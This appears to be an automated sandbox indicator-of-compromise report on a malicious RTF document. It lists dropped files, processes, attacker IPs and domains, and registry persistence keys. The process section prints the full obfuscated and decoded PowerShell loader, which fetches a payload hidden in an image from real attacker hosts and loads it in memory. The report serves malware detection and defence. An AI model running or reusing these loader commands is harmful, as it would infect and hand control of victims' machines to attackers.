IOC Report
SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtf

loading gif

Files

File Path
Type
Category
Malicious
SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtf
Rich Text Format data, version 1
initial sample
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{06BA4240-94DA-46E6-9018-D99C6787D57E}.tmp
Composite Document File V2 Document, Cannot read section info
dropped
 malicious
C:\Users\user\AppData\Roaming\IEneetworkinglover.vbs
Unicode text, UTF-16, little-endian text, with very long lines (771), with CRLF line terminators
dropped
 malicious
C:\Users\user\AppData\Roaming\notess\logs.dat
data
dropped
 malicious
C:\ProgramData\WQQ.vbs
Non-ISO extended-ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\IEnetworkings[1].htm
Unicode text, UTF-16, little-endian text, with very long lines (771), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\UZOyJ[1].txt
Unicode text, UTF-8 text, with very long lines (11123), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B6ABBD88-0240-4BF7-AF42-5B250ACE83CC}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EB05A44A-113C-4A5B-9680-D9BF23BED5BF}.tmp
data
dropped
C:\Users\user\AppData\Local\Temp\52swewso.gka.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\bcuddmnf.io2.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\gxfkmmxd.ei4.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\kfw0jrvb.zg3.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\u2lbs54f.fh3.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\vbslj50e.2tc.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.LNK
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:07 2023, mtime=Fri Aug 11 15:42:07 2023, atime=Sat Apr 20 08:35:54 2024, length=73827, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Generic INItialization configuration [folders]
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
data
dropped
C:\Users\user\Desktop\~$curiteInfo.com.Exploit.ShellCode.69.14498.22623.rtf
data
dropped
There are 12 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
 malicious
C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
 malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\IEneetworkinglover.vbs"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreRgBEDgTreFEDgTreVwDgTrevDgTreDQDgTreNDgTreDgTrexDgTreC8DgTreNQDgTre3DgTreC4DgTreMDgTreDgTre2DgTreC4DgTreNQDgTre5DgTreC4DgTreMwDgTreyDgTreC8DgTreLwDgTre6DgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDEDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreEMDgTreOgBcDgTreFDgTreDgTrecgBvDgTreGcDgTrecgBhDgTreG0DgTreRDgTreBhDgTreHQDgTreYQBcDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBXDgTreFEDgTreUQDgTrenDgTreCwDgTreJwBSDgTreGUDgTreZwBBDgTreHMDgTrebQDgTrenDgTreCwDgTreJwDgTrenDgTreCkDgTreKQB9DgTreCDgTreDgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FDQW/441/57.06.59.32//:ptth' , '1' , 'C:\ProgramData\' , 'WQQ','RegAsm',''))} }"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\WQQ.vbs
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
 malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\WQQ.vbs"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\WQQ.vbs"
malicious

URLs

Name
IP
Malicious
http://23.95.60.75/xampp/htm/IEnetworkings.html
23.95.60.75
 malicious
http://geoplugin.net/json.gp
178.237.33.50
 malicious
sembe.duckdns.org
malicious
http://23.95.60.75/144/WQDF.txt
23.95.60.75
 malicious
http://geoplugin.net/json.gp/C
unknown
 malicious
https://uploaddeimagens.com.br
unknown
 malicious
https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820
172.67.215.45
 malicious
http://nuget.org/NuGet.exe
unknown
http://crl.entrust.net/server1.crl0
unknown
http://23.95.60.75
unknown
http://ocsp.entrust.net03
unknown
https://contoso.com/License
unknown
https://www.google.com;
unknown
http://23.95.60.75/xampp/htm/IEnetworkings.htmlj
unknown
http://23.95.60.75/xampp/htm/IEnetworkings.htmlrrC:
unknown
https://contoso.com/Icon
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
https://analytics.paste.ee
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
https://www.google.com
unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
https://lesferch.github.io/DesktopPic
unknown
http://crl.microso
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://paste.ee/
unknown
https://analytics.paste.ee;
unknown
https://cdnjs.cloudflare.com
unknown
https://paste.ee/d/UZOyJg
unknown
https://cdnjs.cloudflare.com;
unknown
https://paste.ee/d/UZOyJ
104.21.84.67
http://ocsp.entrust.net0D
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://secure.comodo.com/CPS0
unknown
https://secure.gravatar.com
unknown
https://themes.googleusercontent.com
unknown
http://crl.entrust.net/2048ca.crl0
unknown
There are 27 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
sembe.duckdns.org
194.187.251.115
 malicious
uploaddeimagens.com.br
172.67.215.45
 malicious
paste.ee
172.67.187.200
geoplugin.net
178.237.33.50

IPs

IP
Domain
Country
Malicious
23.95.60.75
unknown
United States
malicious
104.21.84.67
unknown
United States
malicious
172.67.215.45
uploaddeimagens.com.br
United States
malicious
194.187.251.115
sembe.duckdns.org
United Kingdom
malicious
178.237.33.50
geoplugin.net
Netherlands

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
 malicious
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Path
 malicious
HKEY_CURRENT_USER\Software\Rmc-P0AEMX
exepath
 malicious
HKEY_CURRENT_USER\Software\Rmc-P0AEMX
licence
 malicious
HKEY_CURRENT_USER\Software\Rmc-P0AEMX
time
 malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
-t#
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Word
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
uu#
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
kw#
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\2823A
2823A
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
